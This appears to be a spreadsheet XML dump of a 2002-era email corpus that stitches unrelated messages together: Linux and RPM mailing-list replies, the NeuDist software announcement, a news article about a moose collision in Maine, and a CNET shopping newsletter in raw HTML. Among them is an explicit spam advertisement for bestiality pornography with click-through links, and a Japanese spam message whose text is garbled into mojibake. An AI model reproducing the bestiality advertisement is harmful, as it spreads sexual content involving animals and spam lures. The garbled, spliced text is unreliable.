 &gt; &gt; Ok, I got ALSA installed and there is no static inbetween mp3s like
 &gt; &gt; before which is great!  My setup is digital 4.1 but sound is only coming
 &gt; &gt; from front 2 speakers and subwoofer, rear speakers there is no sound. 
 &gt; &gt; Also alsamixer or aumix are unresponsive as well. 
 &gt; 
 &gt; Maybe you could find more info or tips on the ALSA page for your card?
 &gt; Also, you could try "alsactl store", editing /etc/asound.state" by hand
 &gt; (for me it contains data similar to what I can control with "alsamixer")
 &gt; then run "alsactl restore" and see if you're able to change what you want
 &gt; that way.
 &gt; 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Matthias Saou                                World Trade Center
 &gt; -------------                                Edificio Norte 4 Planta
 &gt; System and Network Engineer                  08039 Barcelona, Spain
 &gt; Electronic Group Interactive                 Phone : +34 936 00 23 23
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :
 ####[ Linux One Stanza Tip (LOST) ]###########################
 Sub : Finding out files larger than given size       LOST #324
 To find out all files in a dir over a given size, try:
 find /path/to/dir_of_file -type f -size +Nk
 [Where N is a number like 1024 for 1mb, and multiples thereof] 
 ####[Discussions on LIH : 04 Jul 2002]########################
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] report automation with pine?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message ----- 
 From: "Forrest English" &lt;forrest@truffula.net&gt;
 To: &lt;razor-users@example.sourceforge.net&gt;
 Sent: Saturday, August 03, 2002 9:30 AM
 Subject: [Razor-users] report automation with pine?
 &gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt; Hash: SHA1
 &gt; 
 &gt; is there currently a way to integrate razor-report into
 &gt; pine?   spamassassin is killing most of the major spam, but more and more
 &gt; stuff is sneaking in that is very short conscise...  and
 &gt; annoying.  usually with hotmail, aol or yahoo return addresses.  i've
 &gt; blacklisted *@aol.com...   but i'd rather start reporting this stuff in
 &gt; the hopes that it would help someone else avoid it.
 &gt; 
 &gt; anyhow, if it could be done, let me know.  thanks.
 setup the config of pine to 
 enable the enable-unix-pipe-cmd 
 then when reading the message
 enter 
 |  razor-check 
 Regards
 Ray Gardener
 &gt;
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [dgc.chat] First public release of NeuDist Distributed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Status: RO
 Subject: [dgc.chat] First public release of NeuDist Distributed Transaction
 Clearing	Framework
 From: Pelle Braendgaard &lt;pelle@neubia.com&gt;
 To: dgcchat@lists.goldmoney.com
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, DGCChat
 &lt;dgcchat@lists.goldmoney.com&gt;, xmlx &lt;xml-api@intertrader.com&gt;
 Date: 19 Sep 2002 00:05:39 -0500
 Reply-To: &lt;dgcchat@lists.goldmoney.com&gt;
 I'm happy to announce the first public release of NeuDist
 NeuDist is an Open Source Software framework for building applications
 for the Neubia Distributed Clearing Platform.
 This release contains early java libraries and documentation that would
 primarily be of interest to developers.
 Talking about documentation, it is still a bit slim and mainly oriented
 towards people with experience in Java/XML development.
 There are currently no sample applications, but they will be available
 in the next release.
 The framework currently contains the following:
 - Classes for creating "Named Objects", which are authenticated using
 digital signatures within a hierarchy.
 - Storage framework for "Named Objects".
 - Simple XML-Signature implementation (Almost certainly not yet
 interoperable with other implementations)
 - Simple SOAP client
 - Simple Servlet API for handling SOAP requests based on "Named
   Objects".
 - Current types of "Named Objects" include:
     NameSpace objects -- for maintaining the NameSpace Authentication
  	Framework
     AuthenticationTickets -- for doing web site authentication using
 	digital signatures.
 Next major release is scheduled to contain:
  - Core:
 	hard coded root public key, for authenticating top level 	NameSpaces
  - Signing Services:
 	Implementation of web based signing services
 	End user hosted signing service
  - Example User Authentication Application
  - Example Payment System based on NeuDist
 I will be expanding the documentation over the next few weeks. This will
 cover not only more indepth technical documentation, but also higher
 level documentation about the business side of things.
 Read more about NeuDist or download our early version at
 http://neudist.org
 I would love to hear your questions and suggestions. To discuss it
 further please join neudist-discuss@lists.sourceforge.net
 You can join it at:
 http://lists.sourceforge.net/mailman/listinfo/neudist-discuss
 Regards
 Pelle
 -- 
 Antilles Software Ventures SA 		http://neubia.com/asv
 My Web Log Live and Direct from Panama	http://talk.org
 Views of an EconoFist			http://econofist.com
 subscribe: send blank email to dgcchat-join@lists.goldmoney.com
 unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com
 digest: send an email to dgcchat-request@lists.goldmoney.com
 with "set yourname@yourdomain.com digest=on" in the message body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</si>
  <si>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[zzzzteana] Hit a Bigfoot in Maine?  You own it!
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.pressherald.com/news/state/021201moose.shtml
 Maine Sunday Telegram
 Portland, Maine
 Sunday, December 1, 2002
 Driver who hit moose fights county over meat
 By GISELLE GOODMAN, Portland Press Herald Writer
 ------------------------------------------------------------------------
 via http://www.lorencoleman.com
 ------------------------------------------------------------------------
 ACTON  In her freezer at home, Lisa Pierce has ground beef and roasts,
 frozen vegetables and french fries, even a couple of Popsicles. What she
 doesn't have is the meat of the moose she hit and killed with her car on
 Nov. 5, the moose that was rightfully hers, but instead went to a neighbor.
 The lack of it has her embroiled in a fight with the York County Sheriff's
 Department to get back what she says she is owed.
 "I think the deputy thought he was doing me a favor," said Pierce. "I'm a
 woman and he just neglected to think that I would want it. The moose is
 gone, I know that now. I want to be compensated for the meat."
 Whether or not that happens is uncertain. Her experience, though, highlights
 a law some Mainers may not be aware of, but should get to know during this
 peak time of deer-versus-car accidents, as the animals, in their mating
 season, come out of the woods.
 The law is simple: A big-game carcass caught by a car - be it a moose, deer
 or bear - goes to the person who hits it, as long as a law enforcement
 officer is called to the scene and the vehicle is damaged in the accident.
 It comes up quite often in Maine, say officials. Last year, there were 4,055
 cases of vehicles and deer colliding on Maine roads and 600 accidents
 involving moose, according to Mark Latti, spokesman for the Maine Warden
 Service.
 "In a state of what, 1.4 million, with only 215,000 licensed hunters, I
 don't know how many motor vehicle drivers would know how to dress out a
 moose," said Latti. "You do have the option of keeping it."
 Which, for some people, can be valuable compensation for a damaged car.
 Farm-grown deer meat can retail for $8 to $20 per pound in stores. And a
 butchered or dressed moose, which can't be bought or sold anywhere in Maine,
 can produce hundreds of pounds of food.
 Latti said when it comes to moose, the law has been abused since its
 inception in 1991. Every now and then an officer will issue a summons to a
 driver for intentionally killing a moose with a car. That kind of "hunting"
 makes no sense to Latti.
 Hitting a moose, even at a slow speed, is no laughing matter. Large adult
 moose can weigh up to 1,500 pounds and can be more than 9 feet tall. Since
 the bulk of their weight is above the hood level of most cars, their bodies
 often come crashing through windshields in collisions. More often than not,
 crashes like these damage the vehicle, the people inside and the animal.
 Sometimes they are fatal. In 1998, Latti said, there were six moose-related
 fatalities. After that, when the number of moose-hunting permits went from
 2,000 to 3,000, there were less. Maine had three moose-related fatalities in
 2000, one in 2001 and two this year so far, said Stephen McCausland,
 spokesman for the Maine Public Safety Department.
 Pierce considers herself lucky that she and the three children in her car
 did not become part of that statistic early on Election Day. But she also
 feels cheated by the whole situation. After all, her car was totaled.
 On the morning of the accident, Pierce was taking her two children and a
 neighbor's son to school in her 1991 Dodge Dynasty. She said she was going
 along at about 35 mph on a well-traveled road, when a moose came out of
 nowhere.
 "By the time my brain could see moose, he was part of my windshield," she
 said. 
 Pierce is well aware of the law, so as she sat in the ambulance with the
 children, being treated for cuts and bruises, she thought about the moose.
 But the four of them were transferred to the hospital before she could deal
 with it, so she said she wasn't able to follow up on the animal until later
 that day.
 When she inquired, she was told the deputy on the scene gave the
 fully-racked bull moose to a neighbor who showed up with a tractor.
 Her neighbor, she said, subsequently offered her the moose for the $100 it
 took him to carry it away, money she didn't think she should spend. By the
 time she contacted the Attorney General's Office on Nov. 12 to complain
 about the deputy giving her moose away, the neighbor's price had gone up
 another $300 for the cost of butchering 450 pounds of meat.
 And when she called York County Chief Deputy Maurice Ouellette to complain
 that she should be compensated for the moose because it was the officer's
 fault that she didn't have it, Ouellette told her he could not give her cash
 and the best he could do was to give her the next moose struck in York
 County.
 "At that point in time it became an issue of not wanting moose anymore, but
 wanting money," Ouellette said.
 That conversation, and a similar one she had with York County Sheriff Phil
 Cote, left Pierce enraged and she now feels the issue has gone beyond the
 moose.
 But the circumstances that brought her to this point are not surprising to
 other officials.
 "It's the officer's discretion," said Latti. "And if the officer feels the
 person can't immediately remove (the animal), he's got to think of public
 safety and other people on the roadway. If someone is worried about her
 children in her car, the last thing a law enforcement officer wants to ask
 is if she wants the moose."
 Maine State Police Trooper Jeremy Forbes said when he arrives at accidents
 that involve a serious injury to a person, the issue of who gets the animal,
 deer or moose, becomes secondary.
 "The priorities are the injuries and getting people to the hospital," he
 said. "If they are really hurt and going to the hospital, the animal can't
 wait, so we'll probably give it to the next person who stops by."
 This is not comforting to Pierce. She said the deputy could have come to the
 ambulance and asked her what she wanted to do with the moose. With her
 boyfriend, a hunter, nearby, she could have easily taken care of the animal
 herself.
 She knows her situation is probably a lost cause. But she hopes other
 people, especially other women, do not have the same experience.
 "What about people who don't know the law?" she said. "Standing up for my
 rights has just been a big headache."
 Staff Writer Giselle Goodman can be contacted at 324-4888 or at:
 ggoodman@pressherald.com
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Perhaps Apple isn't as user-friendly as we thought...
</t>
  </si>
  <si>
    <t xml:space="preserve">Not that I particuarly enjoy these religious wars, but...
 Adam L. Beberg wrote:
 &gt;My PC at least crashes a few times a day...
 &gt;
 Linux, dude, linux...
 Elias
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Incredible Pictures!!!!!!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;Do you like Sexy Animals doing the wild thing? We have the super hot content on the Internet!&lt;br&gt;
 This is the site you have heard about. Rated the number one adult site three years in a row!&lt;br&gt;
 - Thousands of pics from hardcore fucking, and cum shots to pet on girl.&lt;br&gt;
 &lt;br&gt;
 - Thousands videos&lt;br&gt;
 &lt;br&gt;
 So what are you waiting for?&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;font size="5"&gt;&lt;a href="http://6.lspeedhost.net/wfs/?aid=283360"&gt;CLICK HERE&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;
 &lt;br&gt;
 &lt;b&gt;YOU MUST BE AT LEAST 18 TO ENTER!&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;You have received this advertisement because you have opted in 
 to receive &lt;br&gt;
 free adult internet offers and &lt;br&gt;
 &lt;br&gt;
 specials through our affiliated websites. If you do not wish to receive &lt;br&gt;
 further emails or have received the &lt;br&gt;
 &lt;br&gt;
 email in error you may opt-out of our database by clicking here: &lt;br&gt;
 &lt;a href="http://16.lspeedhost.net/alw/takemeoff.html"&gt;CLICK HERE&lt;/a&gt;&lt;br&gt;
 Please allow 24hours for removal.&lt;br&gt;
 This e-mail is sent in compliance with the Information Exchange Promotion and&lt;br&gt;
 Privacy Protection Act. &lt;br&gt;
 &lt;br&gt;
 section 50 marked as 'Advertisement' with valid 'removal' instruction.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
  [NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?iso-2022-jp?B?GyRCJDckOCRfJEgkYiRiJE4lMyVpJVwlbCE8JTclZyVzGyhK?=
</t>
  </si>
  <si>
    <t xml:space="preserve">͂ĂԂǂ
 ݂Ƃ̃R{[V
 [^rfIicucj
 _x0082_܂ŉcƂł邩킩܂
 ͂߂ɁI
 http://book-i.net/mutou
 i
 `@Écn9@̓
 ȂǂȂ132iBD]I
 (^-^)/~Fg[
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-bugs" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Sparc Solaris (was: Dell GX260 V Redhat 7.3)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 09:46:27AM +0100, Matthew French wrote:
 &gt; Declan Houlihan mentioned:
 &gt; &gt; We're actually investigating switching from Sparc/Solaris to
 &gt; &gt; Intel/Linux.
 &gt; 
 &gt; And then:
 &gt; &gt; At the moment at work, if we want a new workstation, we just
 &gt; &gt; buy whatever Sun's latest system is, we jumpstart it, and
 &gt; &gt; that's it, it's up and running.
 sorry, i missed this.  redhat supplies something similar called kickstart
 (guess who inspired them?).  pc hardware is dumb, so you'll need to use
 a floppy.  otoh, every jumpstart config i've seen required rarp plus
 plugging the new box's ethernet+ip into a file.  a kickstart boot can
 just use a dhcp server.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</si>
  <si>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Re: --with ...
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, C.Lee wrote :
 &gt;  &gt; I think I'll use this "--with &lt;whatever&gt;" switch more and more where
 &gt;  &gt; possible.
 &gt; 	Mmm, great stuff ... Now to get the RedHat Samba packager to do the
 &gt; 	same thing ...
 I'm sure that if you file a bugzilla entry with a relevant patch against
 the spec file, chances of getting the change done are on your side ;-)
 &gt; 	I have used there spec file and fun a few problems in it, and one
 &gt; 	of them was just hashing out things for other use ...
 &gt; 
 &gt; 	Now to get to grips with the Kernel ... still have not found and
 &gt; 	easy way to rebuild the Kernel without having to wait and hour for
 &gt;       it to generate the headers for all arch ... arrrrhhhh ...
 The problem is that "--with &lt;foo&gt; --without &lt;bar&gt;" is clearly not meant to
 change deeply the way a package is built. Its use would be more like
 enabling/disabling gpg, ldap, whateversql support in packages as it's not
 possible to use something like "--with-&lt;foo&gt;=&lt;bar&gt;" which could be used for
 a much wider scope.
 Matthias
 -- 
 Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10
 Load : 0.00 0.12 0.32, AC on-line, battery charging: 100% (4:47)
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Check out the new CLIE PEG-T665C from Sony! (CNET SHOPPER)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Shopper Newsletter: PDA Edition&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#EEEEEE" alink="#0000FF" vlink="#0000FF"&gt;
 &lt;div align="center"&gt;
 &lt;A href="top"&gt;&lt;/A&gt;&lt;!-- header --&gt;
 	&lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 	&lt;tr valign=top&gt;
 		&lt;td width=442 colspan=4&gt;
 			&lt;img src="http://www.cnet.com/i/nl/sh/hd_pda.gif" width="442" height="60" border="0" alt="CNET Shopper PDA Edition"&gt;&lt;br&gt;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&lt;div align="center"&gt; &lt;img 
 src="http://www.techrepublic.com/images/ads/advert_black.gif"
 width="120" height="10" border="0"&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdTQ5FYvNV2H3f2jvrqULcR" target="top"&gt;
 &lt;img src="http://ad.doubleclick.net/ad/N2949.CNET/B962174.6;sz=160x600;ord=[timestamp]?"
 width="160" height="600" border="0"&gt;&lt;/a&gt;&lt;/div&gt;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href="http://clickthru.online.com/Click?q=ae-jOE6QMB1PY9S1a38-mhe2RYEVuRR" &gt;Cyber Shot DSC-F707&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;2&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLxcW00LEWZ5znP-FdWuuFR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;3&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLWMgqwIgnmkSWreAgRDc9R" &gt;Palm m515&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;4&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRJ0yU0Pxv3orMjEsaQuR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;
 		&lt;td align=right&gt;&lt;FONT face="arial, helvetica" size=-1&gt;5&lt;/td&gt;
 		&lt;td&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8cJBw_mS_XGuwrfzJ6nsR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt; 
 &lt;table border="0" cellpadding="0" cellspacing="0" width="160"&gt;
 	&lt;tr&gt;
 		&lt;td&gt;&lt;a href="http://clickthru.online.com/Click?q=17-agitI5XroKRJaD9Iz4s1RhjGRsZR" &gt;&lt;img src="http://www.cnet.com/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt=" " align="absbottom" valign="bottom"&gt;&lt;/a&gt;&amp;nbsp;
 		&lt;a href="http://clickthru.online.com/Click?q=2d-OxQyIbKHcrGkuZgVdngyV7VDjSuR" &gt;&lt;b valign="top" class="m1"&gt;&lt;FONT face="arial, helvetica" size=-1&gt;All most popular&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;
 						&lt;/font&gt;
 					&lt;/FONT&gt;
 &lt;!-- /Most Popular --&gt;
 &lt;BR&gt;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&lt;img src="http://www.cnet.com/i/sh/nl/handhelds_03.gif"&gt;&lt;/td&gt;
 											&lt;/td&gt;
 										&lt;/tr&gt;
 								&lt;/table&gt;
 &lt;!--Prime Feature--&gt;			&lt;table&gt;
 									&lt;TR&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;TR&gt;
 										&lt;TD&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=42-rF7cIPKS0-1or3Spz3F7_4EMIryR" &gt;&lt;IMG SRC="http://www.cnet.com/i/co/ps/200/20082924_200_1.gif" BORDER=0&gt;&lt;/A&gt;
 										&lt;/TD&gt;
 										&lt;TD valign=center&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;a href="http://clickthru.online.com/Click?q=57-YJIXII04A-wyit-F0F_wt9Q9dZPR" &gt;&lt;B&gt;Sony CLIE PEG-T665C&lt;/B&gt;&lt;/a&gt;&lt;BR&gt;
 											&amp;#149; 66MHz processor&lt;BR&gt;
 											&amp;#149; Transflective LCD&lt;BR&gt;
 											&amp;#149; 16MB of RAM&lt;BR&gt;
 											&amp;#149; MP3 playback&lt;BR&gt;
 											&amp;#149; Strong infrared port&lt;BR&gt;
 											&amp;#149; &lt;B&gt;Just &lt;font color="#CC0000"&gt;$354&lt;/font&gt;&lt;/B&gt;
 &lt;br&gt;&lt;img src="/b.gif" width="1" height="10" border="0" alt=""&gt;&lt;br&gt;	
 &lt;a href="http://clickthru.online.com/Click?q=6c-SUL3IuPjQQA2jtbKQCL5-NPyEdnR" &gt;&lt;img src="http://shopper.cnet.com/i/sh/leaf/checkprices.gif" border=0"&gt;&lt;/a&gt;
 										&lt;/TD&gt;
 									&lt;/TR&gt;
 								&lt;/table&gt;
 								&lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 											&lt;B&gt;Accessorize this PDA:&lt;/b&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KB8dLtho7pqfRO9R6BpKcR" &gt;Sony Mini Keyboard &lt;/a&gt;
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtduIRGdDmZjZWSoS2P4JmRR" &gt;Sony AC Adapter&lt;/a&gt;
 										&lt;/td&gt;
 									&lt;/tr&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=ab-ZcQKQYpdiyTKftcXydit0M-0OvFR" &gt;Sony Memory Stick Module&lt;/a&gt; 
 										&lt;/td&gt;
 										&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 										&lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dMyccJV41H99K8FZuS9R" &gt;Sony Carrying Case&lt;/a&gt; 
 										&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=8&gt;&lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td colspan=2&gt;&lt;font face="arial, helvetica" size="-1"&gt;Looking to upgrade your PDA's memory? No matter what type of handheld you use, CNET's Memory Confiturator makes finding the perfect memory upgrade easier than ever. You're just a few clicks away from maximizing your PDA's potential!&lt;P&gt;
 										Check out CNET's new &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPdLaJw4HunOIRzw0LGkkRR" &gt;&lt;B&gt;Memory Configurator&lt;/b&gt;&lt;/a&gt;
 &lt;/td&gt;
 									&lt;/tr&gt;
 									&lt;tr colspan=2&gt;
 										&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=4&gt;&lt;/td&gt;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1 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDFMUEy_Pudo6MzbuNK5xFR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8887507_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QkZj6-LBibgi4cHr7W6T9R" &gt;&lt;B&gt;Palm m130&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available &lt;BR&gt;
 								&amp;#149; 8MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; 65,000-color screen&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$210&lt;/font&gt; &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 2 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGck2jxRJwCAV-hDEc2lRbuR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8928341_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=2a-CNuWIrIPMzg9gWjabman8WccrYsR" &gt;&lt;B&gt;Palm m515&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Fusion of style and power&lt;BR&gt;
 								&amp;#149; 16MB, Palm OS v4.1&lt;BR&gt;
 								&amp;#149; MultiMediaCard slot&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$312&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=3f-4sAEIqMWSI0Dpn-Hcoh57BymNzZR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8602250_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=54-l6ovIZKA72_p4Ae0O9U4lR0vdknR" &gt;&lt;B&gt;Palm i705&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 8MB, USB, rechargeable&lt;BR&gt;
 								&amp;#149; Wireless Internet access&lt;BR&gt;
 								&amp;#149; Always-on e-mail&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$299&lt;/font&gt;&lt;/B&gt;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href="http://clickthru.online.com/Click?q=69-CY-iIoWgaOiw_fyMoAH4OpRzLxrR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/8489836_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=7f-bn6KIIP6RbGSxYq9IO3JewkhBpPR" &gt;&lt;B&gt;Sony CLIE PEG-T615C&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; 16MB, USB, rechargeable&lt;BR&gt;
 								&amp;#149; 16-bit color display&lt;BR&gt;
 								&amp;#149; Palm OS 4.1&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$251&lt;/font&gt; &lt;/B&gt;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href="http://clickthru.online.com/Click?q=94-rOVNQaI7VuW_bBbJ5elUjfr5JQdR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/9789407_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxnPyRjlDz2JQZv91zVMcR" &gt;&lt;B&gt;Toshiba Pocket PC e310&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Powerful mobile productivity&lt;BR&gt;
 								&amp;#149; 3.5-inch TFT display/65K colors&lt;BR&gt;
 								&amp;#149; Plays MP3/video files&lt;BR&gt;
 								&amp;nbsp;&amp;nbsp;&lt;B&gt;Just &lt;font color="#CC0000"&gt;$329&lt;/font&gt; &lt;/B&gt;
 								&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td colspan="2" background="http://www.cnet.com/i/sh/leaf/dots5x7.gif"&gt;&lt;img src="http://www.cnet.com//b.gif" width="409" height="5" alt="" /&gt;&lt;/td&gt;
 							&lt;/tr&gt;
 							&lt;tr&gt;
 								&lt;td width="400" colspan="2"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=5&gt;&lt;/td&gt;
 							&lt;/tr&gt;	
 &lt;!-- Product 6 --&gt;
 							&lt;tr valign="top"&gt;
 								&lt;td width="120"&gt;
 									&lt;a href="http://clickthru.online.com/Click?q=be-B7ixQCpTplAONfJbnY9y52GfwHRR" &gt;&lt;img border=0 src="http://shopper.cnet.com/i/co/ps/120/7934746_120_1.gif"&gt;&lt;/a&gt;
 								&lt;/td&gt;
 								&lt;td width=270 colspan="1" valign="center"&gt;
 								&lt;font face="arial, helvetica" size="-1" &gt;
 								&lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYBLRH63K74p01K7fy3FR" &gt;&lt;B&gt;Compaq iPaq H3835&lt;/b&gt;&lt;/a&gt;&lt;BR&gt;
 								&amp;#149; Free shipping available&lt;BR&gt;
